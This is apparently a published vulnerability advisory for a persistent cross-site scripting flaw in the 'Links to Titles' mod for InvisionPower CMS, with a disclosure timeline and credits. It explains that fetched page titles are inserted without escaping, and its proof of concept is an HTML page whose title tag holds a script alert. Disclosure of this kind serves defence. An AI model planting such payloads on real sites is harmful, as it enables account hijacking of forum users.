InvisionPower cms Links to Titles utility Presistent XSS
===========================================

#Author: UmPire
#Version: 3.0
  (Full details for version 3.1 patch is not mentioned. It's suspicious to affect all versions.)
#Vendor URL: http://invisionpower.com
#Product URL: http://community.invisionpower.com/files/file/3784-links-to-titles/
#Tested: Windows 7

______________________________________________
IPB "Links to Title" mod converts links to the link's title. It converts "http://www.google.com" to "Google" and the href= remains http://www.google.com
The problem is that it doesn't convert html tags to safe html characters. So if we use an html code in the title of the source page, it will be executed in the InvisionPower cms which "Links to Title" is installed on.
______________________________________________

#Product Detection: http://localhost:80/admin/applications/forums/sources/classes/linkTitlesFunctions.php ~ 200 OK

#POC:
    Enter a link in invision power cms: http://localhost:80/test.html

    Contents of test.html:
    <html>
    <title>
    <script>alert('xss')</script>
    </title>
    </html>

#Video:
https://www.youtube.com/watch?v=ap23bnsK8Vg

#Credits:
Iran Security Group - iransec.net
Thanks to Root.Smasher|Black V!per|ali ahmady|Mr.Moein|Sultan Brain|Alireza_Promis|M4hdi|Social Engineer|TaK.FaNaR|LinuxLover|Saeed.Jok3r
Email: ranrep0ker@yahoo.com


#TimeLine:
2014/04/30 --> Found the bug.
2014/05/03 --> Contacted IPS Official Site.(told me to contact the third-party author)
2014/05/04 --> Sent message to third-party author (programmer of "Links to Title") -> No reply
2014/05/05 --> Published the bug.